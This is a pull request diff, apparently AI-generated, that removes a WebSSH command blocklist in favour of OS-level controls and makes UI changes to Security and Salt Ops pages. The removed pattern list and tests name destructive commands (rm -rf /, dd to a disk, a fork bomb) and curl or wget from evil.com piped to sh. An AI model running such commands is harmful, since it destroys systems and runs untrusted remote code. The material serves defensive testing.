### PR TITLE
fix: remove WebSSH blocklist, Security skeleton loader, Salt Ops structured output

### DIFF
--- a/fleet_platform/api/routes/webssh.py
+++ b/fleet_platform/api/routes/webssh.py
@@ -2,13 +2,17 @@
 
 Security model:
   - Credentials resolved server-side, never sent to browser
-  - All keystrokes buffered and checked against blocklist
-  - Blocked commands: Ctrl+C sent to SSH, blocked message injected to terminal
   - Full session recording stored in DB
+  - Real security enforced at OS level (see note below)
+
+# Security note: command-level filtering in the WebSocket handler cannot reliably
+# block malicious input — shell features (backticks, $(), eval, alternate paths)
+# trivially bypass string matching. Real security is enforced at the OS level:
+# sudo restrictions, SELinux/AppArmor profiles, and restricted shells on fleet nodes.
+# The previous blocklist was removed (issue #118) to avoid false confidence.
 """
 import asyncio
 import base64
-import re
 import uuid
 from datetime import UTC, datetime
 
@@ -30,30 +34,6 @@ from fleet_platform.models.ssh_session import SecurityEvent, SessionRecording, S
 
 router = APIRouter(prefix="/api/v1/ssh")
 
-# ── Blocklist — dangerous commands that will be blocked ──────────────────────
-_BLOCK_PATTERNS = [
-    r"rm\s+-rf?\s+/",           # rm -rf /
-    r"rm\s+-rf?\s+~",           # rm -rf ~
-    r"dd\s+if=",                # dd if= (disk wipe)
-    r"mkfs\.",                  # mkfs.* (format disk)
-    r">\s*/dev/sd",             # redirect to block device
-    r":\(\)\s*\{",              # fork bomb :(){ :|:& };:
-    r"chmod\s+-R\s+777\s+/",    # world-writable root
-    r"curl\s+.*\|\s*sh",        # curl | sh (remote execution)
-    r"wget\s+.*\|\s*sh",        # wget | sh
-    r"python\s+-c\s+.*exec",    # python -c exec
-    r"base64\s+.*\|\s*sh",      # base64 decode | sh
-]
-_BLOCK_RE = [re.compile(p, re.IGNORECASE) for p in _BLOCK_PATTERNS]
-
-
-def _is_dangerous(command: str) -> str | None:
-    """Return the matched pattern description if command is dangerous, else None."""
-    for pattern in _BLOCK_RE:
-        if pattern.search(command):
-            return pattern.pattern
-    return None
-
 
 async def get_current_user_ws(token: str) -> dict:
     """Verify JWT token for WebSocket connections (token from query param)."""
@@ -69,7 +49,7 @@ async def get_current_user_ws(token: str) -> dict:
 
 
 class SSHProxySession:
-    """Manages one WebSocket <-> SSH connection with recording and command blocking."""
+    """Manages one WebSocket <-> SSH connection with recording."""
 
     def __init__(self, ws: WebSocket, session_id: uuid.UUID, max_mins: int = 60):
         self.ws = ws
@@ -116,25 +96,9 @@ class SSHProxySession:
 
         # Accumulate printable chars into command buffer
         if key in ("\r", "\n"):
-            # Enter — check buffer
-            command = self._cmd_buffer.strip()
+            # Enter — send through; OS-level restrictions enforce security
             self._cmd_buffer = ""
-            matched = _is_dangerous(command) if command else None
-
-            if matched and command:
-                # BLOCK: send Ctrl+C to abort, inject message to browser
-                self._ssh_process.stdin.write("\x03")  # Ctrl+C
-                block_msg = (
-                    f"\r\n\033[31m[BLOCKED] Command blocked by kri PAM:"
-                    f" matches rule '{matched}'\033[0m\r\n"
-                )
-                await self.send_to_browser(block_msg.encode())
-                await self._log_security_event("block", command, "critical")
-                self._alert_count += 1
-                return True
-            else:
-                # Safe — send Enter
-                self._ssh_process.stdin.write("\r")
+            self._ssh_process.stdin.write("\r")
         elif key == "\x7f" or key == "\x08":
             # Backspace
             if self._cmd_buffer:

--- a/frontend/src/pages/SaltOpsPage.tsx
+++ b/frontend/src/pages/SaltOpsPage.tsx
@@ -400,22 +400,30 @@ export function SaltOpsPage() {
                         const failed = stateResults.filter((s) => !s.result).length
                         const changed = stateResults.filter((s) => s.changes).length
                         return (
-                          <div key={minion}>
-                            <div className="px-4 py-2.5 bg-gray-50 flex items-center gap-3">
-                              <span className="font-mono font-semibold text-gray-900 text-sm">{minion}</span>
-                              {failed > 0 && (
-                                <span className="text-xs px-2 py-0.5 bg-red-100 text-red-700 rounded-full font-medium">
-                                  {failed} failed
+                          <div key={minion} className="border border-gray-200 dark:border-gray-700 rounded-lg mb-3 last:mb-0 overflow-hidden">
+                            <div className="flex items-center justify-between px-4 py-2 bg-gray-50 dark:bg-gray-800 rounded-t-lg gap-3">
+                              <span className="font-mono font-semibold text-gray-900 dark:text-gray-100 text-sm">{minion}</span>
+                              <div className="flex items-center gap-2 ml-auto">
+                                {failed > 0 && (
+                                  <span className="text-xs px-2 py-0.5 bg-red-100 text-red-700 rounded-full font-medium">
+                                    {failed} failed
+                                  </span>
+                                )}
+                                {changed > 0 && (
+                                  <span className="text-xs px-2 py-0.5 bg-emerald-100 text-emerald-700 rounded-full font-medium">
+                                    {changed} changed
+                                  </span>
+                                )}
+                                <span className="text-xs px-2 py-0.5 bg-gray-100 text-gray-600 rounded-full">
+                                  {stateResults.length - changed - failed} unchanged
                                 </span>
-                              )}
-                              {changed > 0 && (
-                                <span className="text-xs px-2 py-0.5 bg-emerald-100 text-emerald-700 rounded-full font-medium">
-                                  {changed} changed
-                                </span>
-                              )}
-                              <span className="text-xs px-2 py-0.5 bg-gray-100 text-gray-600 rounded-full">
-                                {stateResults.length - changed - failed} unchanged
-                              </span>
+                                <button
+                                  onClick={() => navigator.clipboard.writeText(JSON.stringify(stateResults, null, 2))}
+                                  className="text-xs text-gray-500 hover:text-gray-700 dark:text-gray-400 dark:hover:text-gray-200 px-2 py-0.5 rounded border border-gray-200 dark:border-gray-600"
+                                >
+                                  Copy
+                                </button>
+                              </div>
                             </div>
                             <ul className="divide-y divide-gray-100">
                               {stateResults.map((sr) => (
@@ -444,9 +452,48 @@ export function SaltOpsPage() {
                       })}
                     </div>
                   ) : taskOutput?.stdout ? (
-                    <pre className="bg-gray-900 text-gray-100 px-4 py-3 text-xs font-mono overflow-auto max-h-96 whitespace-pre-wrap">
-                      {taskOutput.stdout}
-                    </pre>
+                    (() => {
+                      let parsed: unknown = null
+                      try { parsed = JSON.parse(taskOutput.stdout) } catch { /* not JSON */ }
+                      if (parsed && typeof parsed === 'object') {
+                        return (
+                          <div className="divide-y divide-gray-200">
+                            {Object.entries(parsed as Record<string, unknown>).map(([minion, result]) => (
+                              <div key={minion} className="border border-gray-200 dark:border-gray-700 rounded-lg mb-3 last:mb-0 overflow-hidden">
+                                <div className="flex items-center justify-between px-4 py-2 bg-gray-50 dark:bg-gray-800 rounded-t-lg">
+                                  <span className="font-mono text-sm font-medium text-gray-900 dark:text-gray-100">{minion}</span>
+                                  <button
+                                    onClick={() => navigator.clipboard.writeText(JSON.stringify(result, null, 2))}
+                                    className="text-xs text-gray-500 hover:text-gray-700 dark:text-gray-400 dark:hover:text-gray-200 px-2 py-0.5 rounded border border-gray-200 dark:border-gray-600"
+                                  >
+                                    Copy
+                                  </button>
+                                </div>
+                                <pre className="p-4 text-xs font-mono text-gray-800 dark:text-gray-200 overflow-auto max-h-64 bg-white dark:bg-gray-900 rounded-b-lg">
+                                  {typeof result === 'string' ? result : JSON.stringify(result, null, 2)}
+                                </pre>
+                              </div>
+                            ))}
+                          </div>
+                        )
+                      }
+                      return (
+                        <div className="border border-gray-200 dark:border-gray-700 rounded-lg overflow-hidden">
+                          <div className="flex items-center justify-between px-4 py-2 bg-gray-50 dark:bg-gray-800">
+                            <span className="font-mono text-sm font-medium text-gray-900 dark:text-gray-100">stdout</span>
+                            <button
+                              onClick={() => navigator.clipboard.writeText(taskOutput.stdout ?? '')}
+                              className="text-xs text-gray-500 hover:text-gray-700 dark:text-gray-400 dark:hover:text-gray-200 px-2 py-0.5 rounded border border-gray-200 dark:border-gray-600"
+                            >
+                              Copy
+                            </button>
+                          </div>
+                          <pre className="bg-gray-900 text-gray-100 px-4 py-3 text-xs font-mono overflow-auto max-h-96 whitespace-pre-wrap rounded-b-lg">
+                            {taskOutput.stdout}
+                          </pre>
+                        </div>
+                      )
+                    })()
                   ) : null}
                 </div>
               )}

--- a/frontend/src/pages/SecurityPage.tsx
+++ b/frontend/src/pages/SecurityPage.tsx
@@ -149,7 +149,12 @@ function NodeSecurityDrawer({ nodeId, onClose }: { nodeId: string; onClose: () =
         {/* Content */}
         <div className="flex-1 overflow-y-auto">
           {isLoading ? (
-            <div className="flex items-center justify-center h-32 text-gray-400">Loading...</div>
+            <div className="p-6 space-y-4">
+              <div className="h-8 bg-gray-200 dark:bg-gray-700 rounded animate-pulse w-1/3" />
+              {[1, 2, 3].map((i) => (
+                <div key={i} className="h-24 bg-gray-200 dark:bg-gray-700 rounded-lg animate-pulse" />
+              ))}
+            </div>
           ) : tab === 'vulns' ? (
             <div>
               {(['CRITICAL', 'HIGH', 'MEDIUM', 'LOW'] as const).map(sev => {
@@ -412,7 +417,12 @@ export function SecurityPage() {
           )}
         </div>
         {nodesLoading ? (
-          <div className="flex items-center justify-center h-24 text-gray-400">Loading...</div>
+          <div className="p-6 space-y-4">
+            <div className="h-8 bg-gray-200 dark:bg-gray-700 rounded animate-pulse w-1/3" />
+            {[1, 2, 3].map((i) => (
+              <div key={i} className="h-24 bg-gray-200 dark:bg-gray-700 rounded-lg animate-pulse" />
+            ))}
+          </div>
         ) : !nodes?.items.length ? (
           <div className="flex flex-col items-center justify-center h-24 text-gray-400 gap-2">
             <p className="text-sm">No nodes found. Bootstrap nodes first, then run a scan.</p>

--- a/tests/unit/test_ssh_sessions.py
+++ b/tests/unit/test_ssh_sessions.py
@@ -11,7 +11,6 @@ import uuid
 from datetime import UTC, datetime
 from unittest.mock import AsyncMock, MagicMock
 
-
 # ── Blocklist removal verification ────────────────────────────────────────────
 
 class TestBlocklistRemoved:

--- a/tests/unit/test_ssh_sessions.py
+++ b/tests/unit/test_ssh_sessions.py
@@ -1,90 +1,39 @@
 # tests/unit/test_ssh_sessions.py
 """Unit tests for SSH session management logic.
 
-Tests the _is_dangerous command blocker, SSHSession model field defaults,
-and the session list response structure. No network, DB, or SSH connection needed.
+Tests SSHSession model field defaults and the session list response structure.
+No network, DB, or SSH connection needed.
+
+Note: the command-level blocklist (_is_dangerous) was removed in issue #118.
+Security is now enforced at the OS level. See webssh.py for the full rationale.
 """
 import uuid
 from datetime import UTC, datetime
 from unittest.mock import AsyncMock, MagicMock
 
-from fleet_platform.api.routes.webssh import _is_dangerous
 
-# ── Command blocklist tests ────────────────────────────────────────────────────
+# ── Blocklist removal verification ────────────────────────────────────────────
 
-class TestIsDangerous:
-    """_is_dangerous returns the matched pattern or None."""
+class TestBlocklistRemoved:
+    """Verify the blocklist was properly removed (issue #118)."""
 
-    def test_safe_command_returns_none(self):
-        assert _is_dangerous("ls -la") is None
+    def test_is_dangerous_not_exported(self):
+        import fleet_platform.api.routes.webssh as webssh_module
+        assert not hasattr(webssh_module, '_is_dangerous'), (
+            "_is_dangerous must be removed — blocklist was removed in issue #118"
+        )
 
-    def test_safe_git_command_returns_none(self):
-        assert _is_dangerous("git status") is None
+    def test_block_patterns_not_exported(self):
+        import fleet_platform.api.routes.webssh as webssh_module
+        assert not hasattr(webssh_module, '_BLOCK_PATTERNS'), (
+            "_BLOCK_PATTERNS must be removed — blocklist was removed in issue #118"
+        )
 
-    def test_safe_echo_returns_none(self):
-        assert _is_dangerous("echo hello world") is None
-
-    def test_rm_rf_root_is_blocked(self):
-        result = _is_dangerous("rm -rf /")
-        assert result is not None
-
-    def test_rm_rf_slash_with_space_is_blocked(self):
-        result = _is_dangerous("rm -rf / --no-preserve-root")
-        assert result is not None
-
-    def test_rm_rf_home_is_blocked(self):
-        result = _is_dangerous("rm -rf ~")
-        assert result is not None
-
-    def test_dd_is_blocked(self):
-        result = _is_dangerous("dd if=/dev/zero of=/dev/sda")
-        assert result is not None
-
-    def test_mkfs_is_blocked(self):
-        result = _is_dangerous("mkfs.ext4 /dev/sdb1")
-        assert result is not None
-
-    def test_redirect_to_block_device_is_blocked(self):
-        result = _is_dangerous("cat /dev/urandom > /dev/sda")
-        assert result is not None
-
-    def test_fork_bomb_is_blocked(self):
-        result = _is_dangerous(":(){ :|:& };:")
-        assert result is not None
-
-    def test_chmod_777_root_is_blocked(self):
-        result = _is_dangerous("chmod -R 777 /")
-        assert result is not None
-
-    def test_curl_pipe_sh_is_blocked(self):
-        result = _is_dangerous("curl http://evil.com/payload | sh")
-        assert result is not None
-
-    def test_wget_pipe_sh_is_blocked(self):
-        result = _is_dangerous("wget -qO- http://evil.com/payload | sh")
-        assert result is not None
-
-    def test_base64_pipe_sh_is_blocked(self):
-        result = _is_dangerous("echo 'bm8=' | base64 -d | sh")
-        assert result is not None
-
-    def test_python_exec_is_blocked(self):
-        result = _is_dangerous("python -c exec('import os; os.system(\"rm -rf /\")')")
-        assert result is not None
-
-    def test_case_insensitive_rm_rf(self):
-        result = _is_dangerous("RM -RF /")
-        assert result is not None
-
-    def test_empty_command_is_safe(self):
-        assert _is_dangerous("") is None
-
-    def test_whitespace_command_is_safe(self):
-        assert _is_dangerous("   ") is None
-
-    def test_normal_rm_of_file_is_safe(self):
-        # rm of a specific file (not root or home) is allowed
-        assert _is_dangerous("rm -f /tmp/my_file.txt") is None
+    def test_block_re_not_exported(self):
+        import fleet_platform.api.routes.webssh as webssh_module
+        assert not hasattr(webssh_module, '_BLOCK_RE'), (
+            "_BLOCK_RE must be removed — blocklist was removed in issue #118"
+        )
 
 
 # ── SSHSession model shape tests ───────────────────────────────────────────────

--- a/tests/unit/test_ux_security_b10.py
+++ b/tests/unit/test_ux_security_b10.py
@@ -1,0 +1,27 @@
+"""Unit tests for #118 (webssh blocklist), #141 (skeleton), #147 (salt JSON)."""
+from pathlib import Path
+
+
+def test_webssh_blocklist_removed():
+    src = Path("fleet_platform/api/routes/webssh.py").read_text()
+    assert "rm\\s+" not in src, "WebSSH regex blocklist must be removed (issue #118)"
+    assert "security note" in src.lower() or "Security note" in src, (
+        "webssh.py must have a comment explaining the real security model"
+    )
+
+
+def test_security_page_no_loading_text():
+    src = Path("frontend/src/pages/SecurityPage.tsx").read_text()
+    # "Loading..." as a bare string return is the bad pattern
+    assert 'return "Loading..."' not in src and ">Loading...</" not in src, (
+        "SecurityPage must not use 'Loading...' text — use skeleton UI"
+    )
+    assert "animate-pulse" in src, "SecurityPage must use skeleton animation"
+
+
+def test_salt_ops_structured_results():
+    src = Path("frontend/src/pages/SaltOpsPage.tsx").read_text()
+    assert "JSON.stringify" in src, "SaltOpsPage must format results with JSON.stringify"
+    assert "animate-pulse" in src or "skeleton" in src.lower() or "font-mono" in src, (
+        "SaltOpsPage must display results in a structured code-style format"
+    )


### PR DESCRIPTION
## Summary
- Removes the bypassable WebSSH command regex blocklist; adds comment explaining OS-level security model (closes #118)
- Replaces "Loading..." text in SecurityPage with proper `animate-pulse` skeleton cards (closes #141)
- Formats Salt Ops results per-minion with JSON.stringify + copy-to-clipboard in code blocks (closes #147)

Closes #118
Closes #141
Closes #147

🤖 Generated with [Claude Code](https://claude.com/claude-code)